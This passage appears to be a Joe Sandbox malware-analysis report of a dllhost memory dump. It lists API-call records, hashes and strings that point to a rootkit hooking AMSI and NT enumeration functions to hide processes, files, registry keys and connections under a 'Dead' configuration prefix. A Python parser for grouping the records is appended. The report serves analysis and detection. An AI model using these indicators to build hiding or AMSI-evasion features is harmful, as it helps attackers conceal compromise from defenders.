                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: 3c9f88c4e611def4966ea6c7bc907f8e811a6cd1a12b3cead08829c3b5cd9a3a
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 1F713C36350A90C6EF50AF25E898B9973BCF789B88F002151DE8E53B69DF38C494C352
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 000002E86A091D47
                                                          • Part of subcall function 000002E86A0920C0: GetModuleHandleA.KERNEL32(?,?,?,000002E86A091D79), ref: 000002E86A0920D8
                                                          • Part of subcall function 000002E86A0920C0: GetProcAddress.KERNEL32(?,?,?,000002E86A091D79), ref: 000002E86A0920E9
                                                          • Part of subcall function 000002E86A095F50: GetCurrentThreadId.KERNEL32 ref: 000002E86A095F8B
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID:
                                                        • API String ID: 4184240511-0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A0999B5
                                                        • GetLastError.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A0999C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A0999ED
                                                        • FreeLibrary.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A099A33
                                                        • GetProcAddress.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A099A3F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Delete$CloseEnumOpen
                                                        • String ID: SOFTWARE\Deadconfig
                                                        • API String ID: 3013565938-1882574680
                                                        • Opcode ID: 52927092f250c1abcc012ba980f00c3e647031339fe99cddc7972e625cf8ff0d
                                                        • Instruction ID: 6458ae0190dc3c7e9ac23c9118509b32cf476b90947138c69e15ec66821d85a4
                                                        • Opcode Fuzzy Hash: 52927092f250c1abcc012ba980f00c3e647031339fe99cddc7972e625cf8ff0d
                                                        • Instruction Fuzzy Hash: 6C1186B2614A8486E761CF26F8447D92374F78C7D8F405205E75D4BAA9DF7CC258CB18
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction ID: f7b68f64ddc665392f0f5abcd19a2058114d3a9c50e5c367d6a32e73f184d2f6
                                                        • Opcode Fuzzy Hash: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction Fuzzy Hash: 2AD1AA36249B88C2DF709B16E49835AB7A4F3C8B88F105256EACD57BA5CF3CC591CB41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 2aebc73ed3c4985d4cf6312b6bc67b0686e0ae9bdf34e68b0e52e007a87bd6bb
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: 3231A032741B91C2EE559F56E448369E3A8FB58B80F0450689FDC23B95EF38D4E58B02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: feae79a9befa02bd73794fbeeb9e66503bdc15e1ef8d3b05e6ed7d3095a2e53f
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 4E015725348A80C2EE50DB12F85875AA2A9F78CBC0F488174DE9E43759DF38C986C752
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: 9075b07073775e22313a16b811fb5c1dc7289c43abe67f45632b8638ccd8cb1f
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: 39112D29341B80D6FF249B21E82C71AA3A8BB4DB85F040568CB8D47766EF3DC588C703
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: bbd568375ae247c5d738fcf4c14187593b1fb3de0fed0a8a49dcf9ee61651340
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: DFF044223886C1D2EF608B15F498799A768F758788F849060DB8D465A5DFBCCAC9C702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: 6f6ece8ad2b62840e13be71d4a37ee7a32c1a95d8904781b45671ecdfb89c03d
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 54F05E24244BC0D1EE148B13F908159A668AB4CFD0F18A161EF9E07B69CE38C4C18702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: 8b5c97e27a5915618422442b4c87a2804fa9c7c79347ab6acbe81dbc32166d2c
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: E9F0A765B61BC0D1FF448F60E89C7656368EB88B80F442559968F45162CF3CC4C9C303
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: abe14ad85ef5286f5ecceb258c02e82ea5d24ba747717a0401855bf84e7881e3
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: 1802D536259BC0C6EFA08B5AF49435AB7A4F384794F101056EACE97BA9DF78D484CB01
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 000002E86A0A09C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002E86A0A093F,?,?,?,000002E86A09E263), ref: 000002E86A0A0A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002E86A0A093F,?,?,?,000002E86A09E263), ref: 000002E86A0A0B0A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 2b63081d98ac17825dff97fd6a8992e94ad50607ab32135f18922eba9f75825f
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: CA81E1236A4698C9FF509F20C8983AD67A8F348B98F444295DF8E63797DF3484C1C312
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction ID: 612b391ee09ac68a1ed13b8239540926e0bdac57002250f374c0b4a2cf2b8c43
                                                        • Opcode Fuzzy Hash: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction Fuzzy Hash: 80610A76159B84C6EF608B16E44831AB7E8F388785F105255EACE97BA8DF7CC484CF02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 327ca00819bb8acd53f1ac06ae8871a64ac7b662af68b8d55d8bb677741d6969
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: F7119162BD4A90C1FF581626D49E76950486B6C374F0446F4AFFE0A3F7AE7889C1C302
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: eff8321000ec67bc45d878b7a2d1b3b8c73a6101fa1330f81d8a3361c5f9375c
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 8A117322AD0AF181FF541224E47E3A510596BB5774F2446A4EBFE176F69E34C9C14133
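The two `_set_statfp` records just above are the clearest illustration of what the Similarity fields mean: the same Opcode ID (`26a546e7...`) appears in the `000002E86A060000` dump and in the `000002E86A090000` dump, while the Instruction ID differs. The Python below is an added example, not code from the Joe Sandbox report or its IDA plugin. It parses records in the layout used on this page (bullet `Key: value` lines, the `APIs` call table, the `Memory Dump Source` descriptor, a record closed by its `Instruction Fuzzy Hash` line), strips the page's "Download File" link text from `Associated` entries, groups records by Opcode ID across dumps, and flags functions whose String ID contains an indicator such as `SOFTWARE\Deadconfig`. The sample text is constructed from four records on this page; reading the Opcode ID as operand-independent (so relocated code keeps it while the Instruction ID changes) is an assumption drawn from those two records, not a documented property of the plugin.

```python
"""Parse the Joe Sandbox IDA-plugin function records shown in this section and
group them by Opcode ID. Added example; not code from the report or the plugin."""
import re
from collections import defaultdict

BULLET = re.compile(r"^\s*•\s*(.+?):\s*(.*)$")
LAST_FIELD = "Instruction Fuzzy Hash"   # final Similarity field, closes a record

# Constructed sample, assembled from four records on this page: one with an
# APIs call table, the two _set_statfp records (different dumps, same Opcode
# ID) and the SOFTWARE\Deadconfig record.
SAMPLE = """\
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 000002E86A0A09C2
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002E86A0A093F,?,?,?,000002E86A09E263), ref: 000002E86A0A0A80
• Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
• Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
• API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
• String ID:
• Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
• Instruction ID: 2b63081d98ac17825dff97fd6a8992e94ad50607ab32135f18922eba9f75825f
• Instruction Fuzzy Hash: CA81E1236A4698C9FF509F20C8983AD67A8F348B98F444295DF8E63797DF3484C1C312
• Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
• API ID: _set_statfp
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: 327ca00819bb8acd53f1ac06ae8871a64ac7b662af68b8d55d8bb677741d6969
• Instruction Fuzzy Hash: F7119162BD4A90C1FF581626D49E76950486B6C374F0446F4AFFE0A3F7AE7889C1C302
• Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
• API ID: _set_statfp
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: eff8321000ec67bc45d878b7a2d1b3b8c73a6101fa1330f81d8a3361c5f9375c
• Instruction Fuzzy Hash: 8A117322AD0AF181FF541224E47E3A510596BB5774F2446A4EBFE176F69E34C9C14133
• Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
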